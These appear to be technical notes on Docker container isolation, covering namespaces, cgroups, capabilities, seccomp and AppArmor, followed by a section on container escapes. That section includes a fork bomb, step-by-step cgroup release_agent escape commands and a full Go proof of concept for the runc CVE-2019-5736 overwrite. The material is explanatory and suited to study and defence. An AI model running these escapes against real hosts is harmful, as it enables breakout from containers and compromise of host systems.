PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=127 time=132 ms

--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 132.465/132.465/132.465/0.000 ms

netns: docker1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=127 time=132 ms

--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 132.086/132.086/132.086/0.000 ms

Docker Networking

➜  ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:ae:69:6b brd ff:ff:ff:ff:ff:ff
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 02:42:4b:d6:d3:79 brd ff:ff:ff:ff:ff:ff
19: vethadac88e@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP mode DEFAULT group default
link/ether 26:e8:b8:a7:eb:36 brd ff:ff:ff:ff:ff:ff link-netnsid 1

➜ ~ docker container inspect 093352b2f64b -f "{{.NetworkSettings.SandboxKey}}"
/var/run/docker/netns/c8e883c49b07

➜ ~ l /run/docker/netns/
-r--r--r-- 1 root root 0 Apr 25 21:08 c8e883c49b07

➜ ~ docker exec -it 09 ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
18: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

# Docker keeps its netns files outside iproute2's default location, so plain ip netns cannot operate on them
# Alternatively: nsenter -t <PID> -n
➜ ~ nsenter --net=/run/docker/netns/c8e883c49b07 ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
18: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

To handle more scenarios, Docker actually installs a more elaborate set of iptables rules.

➜  ~ sudo iptables-save
# Generated by iptables-save v1.6.1 on Tue Apr 26 00:15:48 2022
*nat
:PREROUTING ACCEPT [43:5544]
:INPUT ACCEPT [12:868]
:OUTPUT ACCEPT [197:14047]
:POSTROUTING ACCEPT [192:13682]
:DOCKER - [0:0]
-A PREROUTING -m addrtype --dst-type LOCAL -j DOCKER
-A OUTPUT ! -d 127.0.0.0/8 -m addrtype --dst-type LOCAL -j DOCKER
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE
-A DOCKER -i docker0 -j RETURN
COMMIT
# Completed on Tue Apr 26 00:15:48 2022
# Generated by iptables-save v1.6.1 on Tue Apr 26 00:15:48 2022
*filter
:INPUT ACCEPT [216589:98142351]
:FORWARD DROP [4:336]
:OUTPUT ACCEPT [66781:9510774]
:DOCKER - [0:0]
:DOCKER-ISOLATION-STAGE-1 - [0:0]
:DOCKER-ISOLATION-STAGE-2 - [0:0]
:DOCKER-USER - [0:0]
-A FORWARD -j DOCKER-USER
-A FORWARD -j DOCKER-ISOLATION-STAGE-1
-A FORWARD -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -o docker0 -j DOCKER
-A FORWARD -i docker0 ! -o docker0 -j ACCEPT
-A FORWARD -i docker0 -o docker0 -j ACCEPT
-A DOCKER-ISOLATION-STAGE-1 -i docker0 ! -o docker0 -j DOCKER-ISOLATION-STAGE-2
-A DOCKER-ISOLATION-STAGE-1 -j RETURN
-A DOCKER-ISOLATION-STAGE-2 -o docker0 -j DROP
-A DOCKER-ISOLATION-STAGE-2 -j RETURN
-A DOCKER-USER -j RETURN
COMMIT
# Completed on Tue Apr 26 00:15:48 2022
docker network inspect bridge
[
    {
        "Name": "bridge",
        "Id": "3fd9e256f3c3b32ff210b9e748295cd25e6d8b2959f0171a8ba8b26288e1eb11",
        "Created": "2022-04-26T09:27:52.427958616-07:00",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.17.0.0/16",
                    "Gateway": "172.17.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "bb8514e4d9b72a2a44161d235cbac4b59487a48252b379f2f5cea508f8675f7d": {
                "Name": "dreamy_elbakyan",
                "EndpointID": "2c8e20b5d5f30ef79fda1e95096d056daffbc7e20f1d10c067c4b58d13ebf341",
                "MacAddress": "02:42:ac:11:00:02",
                "IPv4Address": "172.17.0.2/16",
                "IPv6Address": ""
            }
        },
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]

Cgroups

cgroups(7) - Linux manual page

2006/2007 => Cgroups v1

2012 => Cgroups v2

Even with all these namespaces, plenty of resources cannot be namespaced: CPU, memory, disk, and so on.

What if someone drops a fork bomb the moment they get in?

=> Limits how much you (groups) can use.

root@ubuntu:/# mount | grep cgroup
cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime)
root@ubuntu:/sys/fs/cgroup/# mkdir testcgp
root@ubuntu:/sys/fs/cgroup/# cd testcgp/
root@ubuntu:/sys/fs/cgroup/testcgp# cat cgroup.controllers
cpuset cpu io memory hugetlb pids rdma misc

root@ubuntu:/sys/fs/cgroup/testcgp# echo 5 > pids.max
root@ubuntu:/sys/fs/cgroup/testcgp# echo $$ > cgroup.procs
root@ubuntu:/sys/fs/cgroup/testcgp# cat cgroup.procs
71188
71480
root@ubuntu:/sys/fs/cgroup/testcgp# :(){ :|:& };:
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable

https://docs.docker.com/config/containers/resource_constraints/

docker run -it --cpus=".1" ubuntu:20.04 bash


Capabilities

Is root inside Docker any different from root outside?

➜  ~ docker exec -it 9f bash
root@9fa04dc61480:/# id
uid=0(root) gid=0(root) groups=0(root)
root@9fa04dc61480:/# hostname test
hostname: you must be root to change the host name

Moreover, with user namespaces an unprivileged user can be mapped to root.
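
A quick check of the resulting uid mapping (uid 1000 here is just the illustrative host user):

➜ ~ unshare -r bash
root@ubuntu:~# cat /proc/self/uid_map
         0       1000          1
root@ubuntu:~# exit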

capabilities(7) - Linux manual page

Starting with kernel 2.2

all-or-nothing UNIX privilege scheme => individual capabilities

Privileges are granted, but not fully granted.
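
File capabilities apply the same idea to binaries; for example, on many distros ping gets raw-socket access through a file capability instead of being setuid root:

➜ ~ getcap /usr/bin/ping
/usr/bin/ping cap_net_raw=ep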

Docker's default capabilities: https://github.com/moby/moby/blob/master/oci/caps/defaults.go

// DefaultCapabilities returns a Linux kernel default capabilities
func DefaultCapabilities() []string {
	return []string{
		"CAP_CHOWN",
		"CAP_DAC_OVERRIDE",
		"CAP_FSETID",
		"CAP_FOWNER",
		"CAP_MKNOD",
		"CAP_NET_RAW",
		"CAP_SETGID",
		"CAP_SETUID",
		"CAP_SETFCAP",
		"CAP_SETPCAP",
		"CAP_NET_BIND_SERVICE",
		"CAP_SYS_CHROOT",
		"CAP_KILL",
		"CAP_AUDIT_WRITE",
	}
}
root@9fa04dc61480:/# cat /proc/1/status
...
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
...

➜ ~ capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

capsh --print
pscap

Exploitation scenarios

  1. With SYS_ADMIN

Technique 1: escape via cgroups; requires --security-opt apparmor=unconfined

Technique 2: CVE-2022-0185

  2. With SYS_PTRACE

Escape via process injection; requires --pid=host and --security-opt apparmor=unconfined

  3. With SYS_MODULE

Load a malicious kernel module and escape directly.

  4. With CAP_DAC_READ_SEARCH

Shocker attack: https://github.com/gabrtv/shocker

https://github.com/cdk-team/CDK/blob/main/pkg/exploit/cap_dac_read_search.go

Containers created by early versions of Docker had CAP_DAC_READ_SEARCH by default, which bypasses file read permission checks and directory read/execute permission checks; the open_by_handle_at syscall can then be used to brute-force the contents of host files.

Other Security Features

➜ ~ docker info -f  '{{.SecurityOptions}}'
[name=apparmor name=seccomp,profile=default]

Seccomp

seccomp(2) - Linux manual page

Seccomp security profiles for Docker

Seccomp (secure computing mode) restricts which syscalls a process may invoke.

{
    "name": "accept",
    "action": "SCMP_ACT_ALLOW",
    "args": []
}

The default Docker profile:

https://github.com/moby/moby/blob/master/profiles/seccomp/default.json
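
To experiment, you can point Docker at a custom profile or disable seccomp entirely; both are standard --security-opt flags (the profile path is a placeholder, and unconfined is for lab use only):

docker run --rm -it --security-opt seccomp=/path/to/profile.json ubuntu:20.04 bash
docker run --rm -it --security-opt seccomp=unconfined ubuntu:20.04 bash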

AppArmor

AppArmor security profiles for Docker

https://gitlab.com/apparmor/apparmor/-/wikis/GettingStarted

Mandatory Access Control (MAC)

AppArmor confines individual programs to a set of files, capabilities, network access and rlimits

docker-default: https://github.com/moby/moby/blob/master/contrib/apparmor/template.go

root@8c7eea4f5e90:/# cat proc/1/attr/apparmor/current
docker-default (enforce)

Summary

A container is, at its heart, a process: a process with an isolated view and constrained resources.

There is no brand-new technology here; it is old wine in a new bottle. In the architecture diagram, replacing "Docker Engine" with "Kernel" would be more accurate.


If a Linux container is a process, then what role does Kubernetes play as the manager of these processes?


Interesting Vulnerabilities

Privileged Container Escape

docker run -it --privileged ubuntu:20.04

What does --privileged mean? See runtime-privilege-and-linux-capabilities:

  • All capabilities

    $ grep CapEff /proc/self/status
    CapEff: 0000003fffffffff
  • Access to all devices on the host

  • Seccomp disabled

  • AppArmor disabled

Mount disk

root@69cdae2e90c3:/# fdisk -l
Device Start End Sectors Size Type
/dev/sda3 1054720 83884031 82829312 39.5G Linux filesystem

root@69cdae2e90c3:/# mount /dev/sda3 /mnt
root@69cdae2e90c3:/# ls /mnt
2333 boot dev home lib32 libx32 media opt root sbin srv sys usr
bin cdrom etc lib lib64 lost+found mnt proc run snap swapfile tmp var

Cgroups (v1) release_agent

https://twitter.com/_fel1x/status/1151487051986087936

"Killing with a borrowed knife": let the host kernel run your payload for you.

# find /sys/fs/cgroup -name release_agent -writable

mkdir -p /sys/fs/cgroup/rdma/test
echo 1 > /sys/fs/cgroup/rdma/test/notify_on_release


echo -e '#!/bin/sh\ntouch /pwwwwwwn' > /exp && chmod +x /exp


host_dir=`sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_dir/exp" > /sys/fs/cgroup/rdma/release_agent
# /var/lib/docker/overlay2/6693d1546847dbab22ca702bc32bb4435b4404484307148445091a1b0dd4d331/diff/exp

# As soon as this sh exits, the test cgroup becomes empty; the notify mechanism fires and the kernel runs release_agent on the host
sh -c 'echo $$ > /sys/fs/cgroup/rdma/test/cgroup.procs'

Does this release_agent technique only work from inside a privileged container?

CVE-2022-0492: Privilege escalation vulnerability causing container escape – Sysdig

A patch fixing this issue was released in kernel 5.17-rc3.

docker run -it \
--security-opt seccomp=unconfined \
--security-opt apparmor=unconfined \
ubuntu:20.04 bash

AWS’s Log4Shell Hot Patch Vulnerable to Privilege Escalation

The AWS bug is interesting because the flaw was not in a Docker component itself, but in a tool they provided to hot-patch log4j.

The write-up also mentioned that the exploitation details would not be published, which immediately made it more interesting.

When I read the article, the bug had been public for about a month; I had meant to cover it earlier but got delayed.

Let's first look at how the tool is meant to be used.

For the Log4Shell response, AWS offered the hot patch through three channels: standalone servers, Kubernetes clusters, and ECS.

We will focus on the Kubernetes one. It works simply: deploy a DaemonSet. By design a DaemonSet runs once on every node, so the patcher lands everywhere; it then periodically walks the process tree and patches every Java process.

If the process lives inside a container, the tool uses nsenter to enter the container's namespaces, and that is exactly where the problem lies.

https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/

Following Log4Shell, AWS released several hot patch solutions that monitor for vulnerable Java applications and Java containers and patch them on the fly. Each solution suits a different environment, covering standalone servers, Kubernetes clusters, Elastic Container Service (ECS) clusters and Fargate.

We’ve decided not to share the exploit’s implementation details at this time to prevent malicious parties from weaponizing it.

April 19: AWS releases final fixes and advisories; Unit 42 discloses the vulnerabilities publicly.

TL;DR: it uses root privileges to nsenter into the container's namespaces, but does not drop privileges before running a program that came from inside the container.

Kubernetes DaemonSet Solution

GitHub - aws-samples/kubernetes-log4j-cve-2021-44228-node-agent

The DaemonSet itself contains no business logic; a shell script simply installs the following deb package on every node (host).

Digging further, unpacking the package gives:

dpkg-deb -x ./log4j-cve-2021-44228-hotpatch_1.1.12_all.deb log4j

├── lib
│ └── systemd
│ └── system
│ └── log4j-cve-2021-44228-hotpatch.service
└── usr
├── bin
│ └── log4j-cve-2021-44228-hotpatch
└── share
└── log4j-cve-2021-44228-hotpatch
├── jdk11
│ └── Log4jHotPatch.jar
├── jdk17
│ └── Log4jHotPatchFat.jar
└── jdk8
└── Log4jHotPatch.jar

A systemd service periodically enumerates all Java processes and runs the following command to hot-patch each one:

java -cp Log4jHotPatch.jar Log4jHotPatch <java-pid>

log4j-cve-2021-44228-hotpatch is itself a bash script; simplified, the logic is:

NSENTER="sudo nsenter -t ${pid} -m -n -i -u -p -Z"

cat /usr/share/log4j-cve-2021-44228-hotpatch/jdk11/Log4jHotPatch.jar | ${NSENTER} sh -c "cat >/dev/shm/Log4jHotPatch.jar"

${NSENTER} -S "$MYEUID" -G "$MYEGID" "$JVM" $JVMOPTS -cp /dev/shm/Log4jHotPatch.jar Log4jHotPatch $container_pid

But nsenter never drops privileges: it executes a program from inside the container with full host privileges. For example:

sudo nsenter -t 42868 -m -n -u -p -Z -S 0 -G 0 grep CapEff /proc/self/status
CapEff: 000001ffffffffff
Seccomp: 0
Seccomp_filters: 0

If an attacker replaces the java binary with a malicious program, we are back to the privileged-container escape of the previous section :)

Fix

Drop privileges + cgroup confinement + seccomp ...

Latest fixed version: kubernetes-log4j-cve-2021-44228-node-agent

Which raises the question: why re-implement all of this instead of using the exec functionality that existing container runtimes already provide?

runc: container breakout


These two bugs show that although Docker has a reputation for being secure and lightweight, early container runtimes were fairly rough, with no shortage of problems.


CVE-2019-5736

A malicious container can overwrite the runc binary on the host and thereby escape (the next time runc is invoked).

https://github.com/twistlock/RunC-CVE-2019-5736

/proc/self/exe

proc(5) - Linux manual page

➜  ~ ls -alh /proc/self/exe
lrwxrwxrwx 1 iubu iubu 0 May 17 14:56 /proc/self/exe -> /usr/bin/ls

It can even be dereferenced across namespaces, which breaks the isolation boundary outright.

The magic symbolic link makes almost anything possible!

=> echo "#!/proc/self/exe" > /bin/sh

=> docker exec container_id sh

=> runc exec container_id sh

=> execve /proc/self/exe

=> runc

(overwrite /proc/self/exe)

=> docker xxx (run runc)

=> pwn

package main

import (
	"fmt"
	"io/ioutil"
	"os"
	"strconv"
	"strings"
)

func main() {
	// This is the line of shell commands that will execute on the host
	var payload = "#!/bin/bash \ntouch /pwwwwwwwn"

	ioutil.WriteFile("/bin/sh", []byte("#!/proc/self/exe"), 0755)

	fmt.Println("[+] Overwritten /bin/sh successfully")

	// Wait for runc to appear in our PID namespace (i.e. for docker exec)
	foundPid := -1
	for foundPid == -1 {
		pids, err := ioutil.ReadDir("/proc")
		if err != nil {
			panic(err)
		}
		for _, f := range pids {
			fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
			if strings.Contains(string(fbytes), "runc") {
				foundPid, _ = strconv.Atoi(f.Name())
				fmt.Println("[+] Found the PID:", f.Name())
				break
			}
		}
	}

	// Grab a read-only fd to runc's binary via /proc/<pid>/exe
	handleFd := -1
	for {
		fmt.Println("[+] Waiting for runc to open the file")
		readHandle, _ := os.OpenFile("/proc/"+strconv.Itoa(foundPid)+"/exe", os.O_RDONLY, 0700)
		if int(readHandle.Fd()) > 0 {
			fmt.Println("[+] Successfully got the file handle")
			handleFd = int(readHandle.Fd())
			break
		}
	}

	// Once runc has exited, reopen our fd for writing and overwrite the host binary
	if writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700); int(writeHandle.Fd()) > 0 {
		fmt.Println("[+] Successfully got write handle", writeHandle)
		if _, err := writeHandle.Write([]byte(payload)); err != nil {
			panic(err)
		}
		fmt.Println("[+] The command executed is" + payload)
		writeHandle.Close()
	}
}


CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host

Breaking out of Docker via runC – Explaining CVE-2019-5736

Why not just overwrite the original /proc/[pid]/exe directly, instead of going through #!/proc/self/exe and executing it again? (Hint: a running binary cannot be opened for writing; you would get ETXTBSY. The trick is to hold a read fd and write through /proc/self/fd/<N> after that runc process exits.)

CVE-2016-9962

https://nvd.nist.gov/vuln/detail/CVE-2016-9962

https://bugzilla.suse.com/show_bug.cgi?id=1012568

Other Containers

Your next container doesn't have to be a container.

Some containers really are virtual machines.


Open Container Initiative (OCI)

https://github.com/opencontainers/runtime-spec

https://github.com/opencontainers/image-spec


gVisor / Kata Containers

Used for cloud functions (FaaS).

https://github.com/google/gvisor

gVisor is an application kernel written in Go that implements a large part of the Linux system call interface, adding an extra isolation layer between the application and the host operating system.


docker run -it --runtime=runsc ubuntu:20.04 bash

https://katacontainers.io

Kata Containers runs each container inside a lightweight virtual machine, using QEMU underneath.

Windows Containers

https://docs.microsoft.com/en-us/virtualization/windowscontainers/about/


# Indicates that the windowsservercore image will be used as the base image.
FROM mcr.microsoft.com/windows/servercore:ltsc2019

# Uses dism.exe to install the IIS role.
RUN dism.exe /online /enable-feature /all /featurename:iis-webserver /NoRestart

# Creates an HTML file and adds content to this file.
RUN echo "Hello World - Dockerfile" > c:\inetpub\wwwroot\index.html

# Sets a command or process that will run each time a container is run from the new image.
CMD [ "cmd" ]


Process Isolation


Hyper-V isolation


Summary

Container (Docker) ? Process : Virtual Machine


References

  • Namespaces in operation
  • 🏗️ Docker Labs
  • Docker implemented in around 100 lines of bash
  • 红蓝对抗中的云原生漏洞挖掘及利用实录
  • All articles on Containers
  • MARS: Kubernetes基础及实践 分享
  • OS: Operating Systems
  • Container Security - Privilege Escalation Techniques
